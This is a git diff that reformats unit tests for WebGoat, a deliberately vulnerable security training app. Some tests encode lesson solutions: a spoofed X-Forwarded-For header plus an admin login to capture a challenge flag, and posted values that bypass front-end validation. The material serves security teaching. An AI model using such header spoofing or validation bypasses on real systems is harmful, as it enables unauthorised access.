- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
+ *
  * <p>
  *
  * @author nbaars
@@ -44,43 +44,42 @@ import static org.mockito.Mockito.when;
  */
 class LessonTrackerTest {
 
-    @Test
-    void allAssignmentsSolvedShouldMarkLessonAsComplete() {
-        Lesson lesson = mock(Lesson.class);
-        when(lesson.getAssignments()).thenReturn(List.of(new Assignment("assignment", "assignment", List.of(""))));
-        LessonTracker lessonTracker = new LessonTracker(lesson);
-        lessonTracker.assignmentSolved("assignment");
+  @Test
+  void allAssignmentsSolvedShouldMarkLessonAsComplete() {
+    Lesson lesson = mock(Lesson.class);
+    when(lesson.getAssignments())
+        .thenReturn(List.of(new Assignment("assignment", "assignment", List.of(""))));
+    LessonTracker lessonTracker = new LessonTracker(lesson);
+    lessonTracker.assignmentSolved("assignment");
 
-        Assertions.assertThat(lessonTracker.isLessonSolved()).isTrue();
-    }
+    Assertions.assertThat(lessonTracker.isLessonSolved()).isTrue();
+  }
 
-    @Test
-    void noAssignmentsSolvedShouldMarkLessonAsInComplete() {
-        Lesson lesson = mock(Lesson.class);
-        Assignment a1 = new Assignment("a1");
-        Assignment a2 = new Assignment("a2");
-        List<Assignment> assignments = List.of(a1, a2);
-        when(lesson.getAssignments()).thenReturn(assignments);
-        LessonTracker lessonTracker = new LessonTracker(lesson);
-        lessonTracker.assignmentSolved("a1");
+  @Test
+  void noAssignmentsSolvedShouldMarkLessonAsInComplete() {
+    Lesson lesson = mock(Lesson.class);
+    Assignment a1 = new Assignment("a1");
+    Assignment a2 = new Assignment("a2");
+    List<Assignment> assignments = List.of(a1, a2);
+    when(lesson.getAssignments()).thenReturn(assignments);
+    LessonTracker lessonTracker = new LessonTracker(lesson);
+    lessonTracker.assignmentSolved("a1");
 
-        Map<Assignment, Boolean> lessonOverview = lessonTracker.getLessonOverview();
-        assertThat(lessonOverview.get(a1)).isTrue();
-        assertThat(lessonOverview.get(a2)).isFalse();
-    }
-
-    @Test
-    void solvingSameAssignmentShouldNotAddItTwice() {
-        Lesson lesson = mock(Lesson.class);
-        Assignment a1 = new Assignment("a1");
-        List<Assignment> assignments = List.of(a1);
-        when(lesson.getAssignments()).thenReturn(assignments);
-        LessonTracker lessonTracker = new LessonTracker(lesson);
-        lessonTracker.assignmentSolved("a1");
-        lessonTracker.assignmentSolved("a1");
-
-        assertThat(lessonTracker.getLessonOverview().size()).isEqualTo(1);
-    }
+    Map<Assignment, Boolean> lessonOverview = lessonTracker.getLessonOverview();
+    assertThat(lessonOverview.get(a1)).isTrue();
+    assertThat(lessonOverview.get(a2)).isFalse();
+  }
 
+  @Test
+  void solvingSameAssignmentShouldNotAddItTwice() {
+    Lesson lesson = mock(Lesson.class);
+    Assignment a1 = new Assignment("a1");
+    List<Assignment> assignments = List.of(a1);
+    when(lesson.getAssignments()).thenReturn(assignments);
+    LessonTracker lessonTracker = new LessonTracker(lesson);
+    lessonTracker.assignmentSolved("a1");
+    lessonTracker.assignmentSolved("a1");
 
+    assertThat(lessonTracker.getLessonOverview().size()).isEqualTo(1);
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/container/users/UserRepositoryTest.java b/src/test/java/org/owasp/webgoat/container/users/UserRepositoryTest.java
index 3025c243d..e8ef4b8ab 100644
--- a/src/test/java/org/owasp/webgoat/container/users/UserRepositoryTest.java
+++ b/src/test/java/org/owasp/webgoat/container/users/UserRepositoryTest.java
@@ -2,27 +2,24 @@ package org.owasp.webgoat.container.users;
 
 import org.assertj.core.api.Assertions;
 import org.junit.jupiter.api.Test;
-import org.owasp.webgoat.container.WebGoat;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.boot.test.autoconfigure.orm.jpa.DataJpaTest;
 import org.springframework.test.context.ActiveProfiles;
-import org.springframework.test.context.ContextConfiguration;
 
 @DataJpaTest
 @ActiveProfiles("webgoat-test")
 class UserRepositoryTest {
 
-    @Autowired
-    private UserRepository userRepository;
+  @Autowired private UserRepository userRepository;
 
-    @Test
-    void userShouldBeSaved() {
-        WebGoatUser user = new WebGoatUser("test", "password");
-        userRepository.saveAndFlush(user);
+  @Test
+  void userShouldBeSaved() {
+    WebGoatUser user = new WebGoatUser("test", "password");
+    userRepository.saveAndFlush(user);
 
-        user = userRepository.findByUsername("test");
+    user = userRepository.findByUsername("test");
 
-        Assertions.assertThat(user.getUsername()).isEqualTo("test");
-        Assertions.assertThat(user.getPassword()).isEqualTo("password");
-    }
+    Assertions.assertThat(user.getUsername()).isEqualTo("test");
+    Assertions.assertThat(user.getPassword()).isEqualTo("password");
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/container/users/UserServiceTest.java b/src/test/java/org/owasp/webgoat/container/users/UserServiceTest.java
index 29a8ed5f5..1bcef2496 100644
--- a/src/test/java/org/owasp/webgoat/container/users/UserServiceTest.java
+++ b/src/test/java/org/owasp/webgoat/container/users/UserServiceTest.java
@@ -1,37 +1,34 @@
 package org.owasp.webgoat.container.users;
 
+import static org.mockito.ArgumentMatchers.any;
+import static org.mockito.Mockito.when;
+
+import java.util.List;
+import java.util.function.Function;
 import org.assertj.core.api.Assertions;
 import org.flywaydb.core.Flyway;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.Mock;
 import org.mockito.junit.jupiter.MockitoExtension;
-import org.owasp.webgoat.container.lessons.Initializeable;
 import org.springframework.jdbc.core.JdbcTemplate;
 import org.springframework.security.core.userdetails.UsernameNotFoundException;
 
-import java.util.List;
-import java.util.function.Function;
-
-import static org.mockito.ArgumentMatchers.any;
-import static org.mockito.Mockito.when;
-
 @ExtendWith(MockitoExtension.class)
 class UserServiceTest {
 
-    @Mock
-    private UserRepository userRepository;
-    @Mock
-    private UserTrackerRepository userTrackerRepository;
-    @Mock
-    private JdbcTemplate jdbcTemplate;
-    @Mock
-    private Function<String, Flyway> flywayLessons;
+  @Mock private UserRepository userRepository;
+  @Mock private UserTrackerRepository userTrackerRepository;
+  @Mock private JdbcTemplate jdbcTemplate;
+  @Mock private Function<String, Flyway> flywayLessons;
 
-    @Test
-    void shouldThrowExceptionWhenUserIsNotFound() {
-        when(userRepository.findByUsername(any())).thenReturn(null);
-        UserService userService = new UserService(userRepository, userTrackerRepository, jdbcTemplate, flywayLessons, List.of());
-        Assertions.assertThatThrownBy(() -> userService.loadUserByUsername("unknown")).isInstanceOf(UsernameNotFoundException.class);
-    }
+  @Test
+  void shouldThrowExceptionWhenUserIsNotFound() {
+    when(userRepository.findByUsername(any())).thenReturn(null);
+    UserService userService =
+        new UserService(
+            userRepository, userTrackerRepository, jdbcTemplate, flywayLessons, List.of());
+    Assertions.assertThatThrownBy(() -> userService.loadUserByUsername("unknown"))
+        .isInstanceOf(UsernameNotFoundException.class);
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/container/users/UserTrackerRepositoryTest.java b/src/test/java/org/owasp/webgoat/container/users/UserTrackerRepositoryTest.java
index 9caa0ab2b..fd341a865 100644
--- a/src/test/java/org/owasp/webgoat/container/users/UserTrackerRepositoryTest.java
+++ b/src/test/java/org/owasp/webgoat/container/users/UserTrackerRepositoryTest.java
@@ -1,5 +1,6 @@
 package org.owasp.webgoat.container.users;
 
+import java.util.List;
 import org.assertj.core.api.Assertions;
 import org.assertj.core.util.Lists;
 import org.junit.jupiter.api.Test;
@@ -10,74 +11,70 @@ import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.boot.test.autoconfigure.orm.jpa.DataJpaTest;
 import org.springframework.test.context.ActiveProfiles;
 
-import java.util.List;
-
 @DataJpaTest
 @ActiveProfiles("webgoat-test")
 class UserTrackerRepositoryTest {
 
-    private class TestLesson extends Lesson {
+  private class TestLesson extends Lesson {
 
-        @Override
-        public Category getDefaultCategory() {
-            return Category.CLIENT_SIDE;
-        }
-
-        @Override
-        public String getTitle() {
-            return "test";
-        }
-
-        @Override
-        public List<Assignment> getAssignments() {
-            Assignment assignment = new Assignment("test", "test", Lists.newArrayList());
-            return Lists.newArrayList(assignment);
-        }
+    @Override
+    public Category getDefaultCategory() {
+      return Category.CLIENT_SIDE;
     }
 
-    @Autowired
-    private UserTrackerRepository userTrackerRepository;
-
-    @Test
-    void saveUserTracker() {
-        UserTracker userTracker = new UserTracker("test");
-
-        userTrackerRepository.save(userTracker);
-
-        userTracker = userTrackerRepository.findByUser("test");
-        Assertions.assertThat(userTracker.getLessonTracker("test")).isNotNull();
+    @Override
+    public String getTitle() {
+      return "test";
     }
 
-    @Test
-    void solvedAssignmentsShouldBeSaved() {
-        UserTracker userTracker = new UserTracker("test");
-        TestLesson lesson = new TestLesson();
-        userTracker.getLessonTracker(lesson);
-        userTracker.assignmentFailed(lesson);
-        userTracker.assignmentFailed(lesson);
-        userTracker.assignmentSolved(lesson, "test");
-
-        userTrackerRepository.saveAndFlush(userTracker);
-
-        userTracker = userTrackerRepository.findByUser("test");
-        Assertions.assertThat(userTracker.numberOfAssignmentsSolved()).isEqualTo(1);
+    @Override
+    public List<Assignment> getAssignments() {
+      Assignment assignment = new Assignment("test", "test", Lists.newArrayList());
+      return Lists.newArrayList(assignment);
     }
+  }
 
-    @Test
-    void saveAndLoadShouldHaveCorrectNumberOfAttempts() {
-        UserTracker userTracker = new UserTracker("test");
-        TestLesson lesson = new TestLesson();
-        userTracker.getLessonTracker(lesson);
-        userTracker.assignmentFailed(lesson);
-        userTracker.assignmentFailed(lesson);
-        userTrackerRepository.saveAndFlush(userTracker);
+  @Autowired private UserTrackerRepository userTrackerRepository;
 
-        userTracker = userTrackerRepository.findByUser("test");
-        userTracker.assignmentFailed(lesson);
-        userTracker.assignmentFailed(lesson);
-        userTrackerRepository.saveAndFlush(userTracker);
+  @Test
+  void saveUserTracker() {
+    UserTracker userTracker = new UserTracker("test");
 
-        Assertions.assertThat(userTracker.getLessonTracker(lesson).getNumberOfAttempts()).isEqualTo(4);
-    }
+    userTrackerRepository.save(userTracker);
 
+    userTracker = userTrackerRepository.findByUser("test");
+    Assertions.assertThat(userTracker.getLessonTracker("test")).isNotNull();
+  }
+
+  @Test
+  void solvedAssignmentsShouldBeSaved() {
+    UserTracker userTracker = new UserTracker("test");
+    TestLesson lesson = new TestLesson();
+    userTracker.getLessonTracker(lesson);
+    userTracker.assignmentFailed(lesson);
+    userTracker.assignmentFailed(lesson);
+    userTracker.assignmentSolved(lesson, "test");
+
+    userTrackerRepository.saveAndFlush(userTracker);
+
+    userTracker = userTrackerRepository.findByUser("test");
+    Assertions.assertThat(userTracker.numberOfAssignmentsSolved()).isEqualTo(1);
+  }
+
+  @Test
+  void saveAndLoadShouldHaveCorrectNumberOfAttempts() {
+    UserTracker userTracker = new UserTracker("test");
+    TestLesson lesson = new TestLesson();
+    userTracker.getLessonTracker(lesson);
+    userTracker.assignmentFailed(lesson);
+    userTracker.assignmentFailed(lesson);
+    userTrackerRepository.saveAndFlush(userTracker);
+
+    userTracker = userTrackerRepository.findByUser("test");
+    userTracker.assignmentFailed(lesson);
+    userTracker.assignmentFailed(lesson);
+    userTrackerRepository.saveAndFlush(userTracker);
+
+    Assertions.assertThat(userTracker.getLessonTracker(lesson).getNumberOfAttempts()).isEqualTo(4);
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/container/users/UserValidatorTest.java b/src/test/java/org/owasp/webgoat/container/users/UserValidatorTest.java
index e9c3c94e5..ec5957fa0 100644
--- a/src/test/java/org/owasp/webgoat/container/users/UserValidatorTest.java
+++ b/src/test/java/org/owasp/webgoat/container/users/UserValidatorTest.java
@@ -1,5 +1,9 @@
 package org.owasp.webgoat.container.users;
 
+import static org.assertj.core.api.Assertions.assertThat;
+import static org.mockito.ArgumentMatchers.anyString;
+import static org.mockito.Mockito.when;
+
 import org.assertj.core.api.Assertions;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
@@ -8,53 +12,48 @@ import org.mockito.junit.jupiter.MockitoExtension;
 import org.springframework.validation.BeanPropertyBindingResult;
 import org.springframework.validation.Errors;
 
-import static org.assertj.core.api.Assertions.assertThat;
-import static org.mockito.ArgumentMatchers.anyString;
-import static org.mockito.Mockito.when;
-
 @ExtendWith(MockitoExtension.class)
 class UserValidatorTest {
 
-    @Mock
-    private UserRepository userRepository;
+  @Mock private UserRepository userRepository;
 
-    @Test
-    void passwordsShouldMatch() {
-        UserForm userForm = new UserForm();
-        userForm.setAgree("true");
-        userForm.setUsername("test1234");
-        userForm.setPassword("test1234");
-        userForm.setMatchingPassword("test1234");
-        Errors errors = new BeanPropertyBindingResult(userForm, "userForm");
-        new UserValidator(userRepository).validate(userForm, errors);
-        Assertions.assertThat(errors.hasErrors()).isFalse();
-    }
+  @Test
+  void passwordsShouldMatch() {
+    UserForm userForm = new UserForm();
+    userForm.setAgree("true");
+    userForm.setUsername("test1234");
+    userForm.setPassword("test1234");
+    userForm.setMatchingPassword("test1234");
+    Errors errors = new BeanPropertyBindingResult(userForm, "userForm");
+    new UserValidator(userRepository).validate(userForm, errors);
+    Assertions.assertThat(errors.hasErrors()).isFalse();
+  }
 
-    @Test
-    void shouldGiveErrorWhenPasswordsDoNotMatch() {
-        UserForm userForm = new UserForm();
-        userForm.setAgree("true");
-        userForm.setUsername("test1234");
-        userForm.setPassword("test12345");
-        userForm.setMatchingPassword("test1234");
-        Errors errors = new BeanPropertyBindingResult(userForm, "userForm");
-        new UserValidator(userRepository).validate(userForm, errors);
-        Assertions.assertThat(errors.hasErrors()).isTrue();
-        assertThat(errors.getFieldError("matchingPassword").getCode()).isEqualTo("password.diff");
-    }
-
-    @Test
-    void shouldGiveErrorWhenUserAlreadyExists() {
-        UserForm userForm = new UserForm();
-        userForm.setAgree("true");
-        userForm.setUsername("test12345");
-        userForm.setPassword("test12345");
-        userForm.setMatchingPassword("test12345");
-        when(userRepository.findByUsername(anyString())).thenReturn(new WebGoatUser("test1245", "password"));
-        Errors errors = new BeanPropertyBindingResult(userForm, "userForm");
-        new UserValidator(userRepository).validate(userForm, errors);
-        Assertions.assertThat(errors.hasErrors()).isTrue();
-        assertThat(errors.getFieldError("username").getCode()).isEqualTo("username.duplicate");
-    }
+  @Test
+  void shouldGiveErrorWhenPasswordsDoNotMatch() {
+    UserForm userForm = new UserForm();
+    userForm.setAgree("true");
+    userForm.setUsername("test1234");
+    userForm.setPassword("test12345");
+    userForm.setMatchingPassword("test1234");
+    Errors errors = new BeanPropertyBindingResult(userForm, "userForm");
+    new UserValidator(userRepository).validate(userForm, errors);
+    Assertions.assertThat(errors.hasErrors()).isTrue();
+    assertThat(errors.getFieldError("matchingPassword").getCode()).isEqualTo("password.diff");
+  }
 
+  @Test
+  void shouldGiveErrorWhenUserAlreadyExists() {
+    UserForm userForm = new UserForm();
+    userForm.setAgree("true");
+    userForm.setUsername("test12345");
+    userForm.setPassword("test12345");
+    userForm.setMatchingPassword("test12345");
+    when(userRepository.findByUsername(anyString()))
+        .thenReturn(new WebGoatUser("test1245", "password"));
+    Errors errors = new BeanPropertyBindingResult(userForm, "userForm");
+    new UserValidator(userRepository).validate(userForm, errors);
+    Assertions.assertThat(errors.hasErrors()).isTrue();
+    assertThat(errors.getFieldError("username").getCode()).isEqualTo("username.duplicate");
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/authbypass/BypassVerificationTest.java b/src/test/java/org/owasp/webgoat/lessons/authbypass/BypassVerificationTest.java
index 03d1be62f..7e3ba3961 100644
--- a/src/test/java/org/owasp/webgoat/lessons/authbypass/BypassVerificationTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/authbypass/BypassVerificationTest.java
@@ -25,54 +25,57 @@
 
 package org.owasp.webgoat.lessons.authbypass;
 
+import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
+
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.junit.jupiter.MockitoExtension;
 import org.owasp.webgoat.container.assignments.AssignmentEndpointTest;
-import org.owasp.webgoat.lessons.authbypass.VerifyAccount;
 import org.springframework.test.web.servlet.MockMvc;
 
-import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
-
 @ExtendWith(MockitoExtension.class)
 public class BypassVerificationTest extends AssignmentEndpointTest {
 
-    private MockMvc mockMvc;
+  private MockMvc mockMvc;
 
-    @BeforeEach
-    public void setup() {
-        VerifyAccount verifyAccount = new VerifyAccount();
-        init(verifyAccount);
-        this.mockMvc = standaloneSetup(verifyAccount).build();
-    }
+  @BeforeEach
+  public void setup() {
+    VerifyAccount verifyAccount = new VerifyAccount();
+    init(verifyAccount);
+    this.mockMvc = standaloneSetup(verifyAccount).build();
+  }
 
-    @Test
-    public void placeHolder() {
-        assert (true);
-    }
+  @Test
+  public void placeHolder() {
+    assert (true);
+  }
 
-//TODO: Finish tests below ... getting null on injected/mocked userSession for some reason (in AssignmentEndpoint:58 even though it it mocked via AssignmentEncpointTest and works in other tests)
-//    @Test
-//    public void testCheatingDetection() throws Exception {
-//       ResultActions results = mockMvc.perform(MockMvcRequestBuilders.post("/auth-bypass/verify-account")
-//               .param("secQuestion0","Dr. Watson")
-//               .param("secQuestion1","Baker Street")
-//               .param("verifyMethod","SEC_QUESTIONS")
-//               .param("userId","1223445"));
-//
-//        results.andExpect(status().isOk())
-//                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("verify-account.cheated"))));
-//    }
+  // TODO: Finish tests below ... getting null on injected/mocked userSession for some reason (in
+  // AssignmentEndpoint:58 even though it it mocked via AssignmentEncpointTest and works in other
+  // tests)
+  //    @Test
+  //    public void testCheatingDetection() throws Exception {
+  //       ResultActions results =
+  // mockMvc.perform(MockMvcRequestBuilders.post("/auth-bypass/verify-account")
+  //               .param("secQuestion0","Dr. Watson")
+  //               .param("secQuestion1","Baker Street")
+  //               .param("verifyMethod","SEC_QUESTIONS")
+  //               .param("userId","1223445"));
+  //
+  //        results.andExpect(status().isOk())
+  //                .andExpect(jsonPath("$.feedback",
+  // CoreMatchers.is(messages.getMessage("verify-account.cheated"))));
+  //    }
 
-//    @Test
-//    public void success() {
-//
-//    }
+  //    @Test
+  //    public void success() {
+  //
+  //    }
 
-//    @Test
-//    public void failure() {
-//
-//    }
+  //    @Test
+  //    public void failure() {
+  //
+  //    }
 
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictionsFrontendValidationTest.java b/src/test/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictionsFrontendValidationTest.java
index a8e5a513a..d48df1629 100644
--- a/src/test/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictionsFrontendValidationTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/bypassrestrictions/BypassRestrictionsFrontendValidationTest.java
@@ -1,32 +1,33 @@
 package org.owasp.webgoat.lessons.bypassrestrictions;
 
-import org.junit.jupiter.api.BeforeEach;
-import org.junit.jupiter.api.Test;
-import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.bypassrestrictions.BypassRestrictions;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-import org.springframework.test.web.servlet.setup.MockMvcBuilders;
-
 import static org.hamcrest.Matchers.is;
 import static org.mockito.Mockito.when;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+import org.springframework.test.web.servlet.setup.MockMvcBuilders;
+
 /**
  * @author nbaars
  * @since 6/16/17.
  */
 public class BypassRestrictionsFrontendValidationTest extends LessonTest {
 
-    @BeforeEach
-    public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(new BypassRestrictions());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-    }
+  @BeforeEach
+  public void setup() {
+    when(webSession.getCurrentLesson()).thenReturn(new BypassRestrictions());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+  }
 
-    @Test
-    void noChangesShouldNotPassTheLesson() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/BypassRestrictions/frontendValidation")
+  @Test
+  void noChangesShouldNotPassTheLesson() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/BypassRestrictions/frontendValidation")
                 .param("field1", "abc")
                 .param("field2", "123")
                 .param("field3", "abc ABC 123")
@@ -35,12 +36,15 @@ public class BypassRestrictionsFrontendValidationTest extends LessonTest {
                 .param("field6", "90201 1111")
                 .param("field7", "301-604-4882")
                 .param("error", "2"))
-                .andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(false)));
-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(false)));
+  }
 
-    @Test
-    void bypassAllFieldShouldPass() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/BypassRestrictions/frontendValidation")
+  @Test
+  void bypassAllFieldShouldPass() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/BypassRestrictions/frontendValidation")
                 .param("field1", "abcd")
                 .param("field2", "1234")
                 .param("field3", "abc $ABC 123")
@@ -49,12 +53,15 @@ public class BypassRestrictionsFrontendValidationTest extends LessonTest {
                 .param("field6", "90201 1111AA")
                 .param("field7", "301-604-4882$$")
                 .param("error", "0"))
-                .andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(true)));
-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(true)));
+  }
 
-    @Test
-    void notBypassingAllFieldShouldNotPass() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/BypassRestrictions/frontendValidation")
+  @Test
+  void notBypassingAllFieldShouldNotPass() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/BypassRestrictions/frontendValidation")
                 .param("field1", "abc")
                 .param("field2", "1234")
                 .param("field3", "abc $ABC 123")
@@ -63,8 +70,7 @@ public class BypassRestrictionsFrontendValidationTest extends LessonTest {
                 .param("field6", "90201 1111AA")
                 .param("field7", "301-604-4882AA")
                 .param("error", "0"))
-                .andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(false)));
-    }
-
-
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(false)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/challenges/Assignment1Test.java b/src/test/java/org/owasp/webgoat/lessons/challenges/Assignment1Test.java
index c52429491..3628cb904 100644
--- a/src/test/java/org/owasp/webgoat/lessons/challenges/Assignment1Test.java
+++ b/src/test/java/org/owasp/webgoat/lessons/challenges/Assignment1Test.java
@@ -22,24 +22,21 @@
 
 package org.owasp.webgoat.lessons.challenges;
 
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
+
+import java.net.InetAddress;
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.junit.jupiter.MockitoExtension;
 import org.owasp.webgoat.container.assignments.AssignmentEndpointTest;
-import org.owasp.webgoat.lessons.challenges.Flag;
-import org.owasp.webgoat.lessons.challenges.SolutionConstants;
 import org.owasp.webgoat.lessons.challenges.challenge1.Assignment1;
 import org.owasp.webgoat.lessons.challenges.challenge1.ImageServlet;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
-import java.net.InetAddress;
-
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
-
 /**
  * @author nbaars
  * @since 5/2/17.
@@ -47,54 +44,65 @@ import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standal
 @ExtendWith(MockitoExtension.class)
 class Assignment1Test extends AssignmentEndpointTest {
 
-    private MockMvc mockMvc;
+  private MockMvc mockMvc;
 
-    @BeforeEach
-    void setup() {
-        Assignment1 assignment1 = new Assignment1();
-        init(assignment1);
-        new Flag().initFlags();
-        this.mockMvc = standaloneSetup(assignment1).build();
-    }
+  @BeforeEach
+  void setup() {
+    Assignment1 assignment1 = new Assignment1();
+    init(assignment1);
+    new Flag().initFlags();
+    this.mockMvc = standaloneSetup(assignment1).build();
+  }
 
-    @Test
-    void success() throws Exception {
-        InetAddress addr = InetAddress.getLocalHost();
-        String host = addr.getHostAddress();
-        mockMvc.perform(MockMvcRequestBuilders.post("/challenge/1")
+  @Test
+  void success() throws Exception {
+    InetAddress addr = InetAddress.getLocalHost();
+    String host = addr.getHostAddress();
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/challenge/1")
                 .header("X-Forwarded-For", host)
                 .param("username", "admin")
-                .param("password", SolutionConstants.PASSWORD.replace("1234", String.format("%04d",ImageServlet.PINCODE))))
-                .andExpect(jsonPath("$.feedback", CoreMatchers.containsString("flag: " + Flag.FLAGS.get(1))))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
-    }
+                .param(
+                    "password",
+                    SolutionConstants.PASSWORD.replace(
+                        "1234", String.format("%04d", ImageServlet.PINCODE))))
+        .andExpect(
+            jsonPath("$.feedback", CoreMatchers.containsString("flag: " + Flag.FLAGS.get(1))))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+  }
 
-    @Test
-    void wrongPassword() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/challenge/1")
+  @Test
+  void wrongPassword() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/challenge/1")
                 .param("username", "admin")
                 .param("password", "wrong"))
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
+        .andExpect(
+            jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 
-//    @Test
-//    public void correctPasswordXForwardHeaderMissing() throws Exception {
-//        mockMvc.perform(MockMvcRequestBuilders.post("/challenge/1")
-//                .param("username", "admin")
-//                .param("password", SolutionConstants.PASSWORD))
-//                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("ip.address.unknown"))))
-//                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-//    }
+  //    @Test
+  //    public void correctPasswordXForwardHeaderMissing() throws Exception {
+  //        mockMvc.perform(MockMvcRequestBuilders.post("/challenge/1")
+  //                .param("username", "admin")
+  //                .param("password", SolutionConstants.PASSWORD))
+  //                .andExpect(jsonPath("$.feedback",
+  // CoreMatchers.is(messages.getMessage("ip.address.unknown"))))
+  //                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  //    }
 
-//    @Test
-//    public void correctPasswordXForwardHeaderWrong() throws Exception {
-//        mockMvc.perform(MockMvcRequestBuilders.post("/challenge/1")
-//                .header("X-Forwarded-For", "127.0.1.2")
-//                .param("username", "admin")
-//                .param("password", SolutionConstants.PASSWORD))
-//                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("ip.address.unknown"))))
-//                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-//    }
+  //    @Test
+  //    public void correctPasswordXForwardHeaderWrong() throws Exception {
+  //        mockMvc.perform(MockMvcRequestBuilders.post("/challenge/1")
+  //                .header("X-Forwarded-For", "127.0.1.2")
+  //                .param("username", "admin")
+  //                .param("password", SolutionConstants.PASSWORD))
+  //                .andExpect(jsonPath("$.feedback",
+  // CoreMatchers.is(messages.getMessage("ip.address.unknown"))))
+  //                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  //    }
 
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/chromedevtools/ChromeDevToolsTest.java b/src/test/java/org/owasp/webgoat/lessons/chromedevtools/ChromeDevToolsTest.java
index cf15eb3d4..de4d93dd1 100644
--- a/src/test/java/org/owasp/webgoat/lessons/chromedevtools/ChromeDevToolsTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/chromedevtools/ChromeDevToolsTest.java
@@ -1,20 +1,18 @@
 package org.owasp.webgoat.lessons.chromedevtools;
 
+import static org.mockito.Mockito.when;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
+
 import org.hamcrest.Matchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.chromedevtools.ChromeDevTools;
-import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 
-import static org.mockito.Mockito.when;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
-
 /**
  * @author Benedikt Stuhrmann
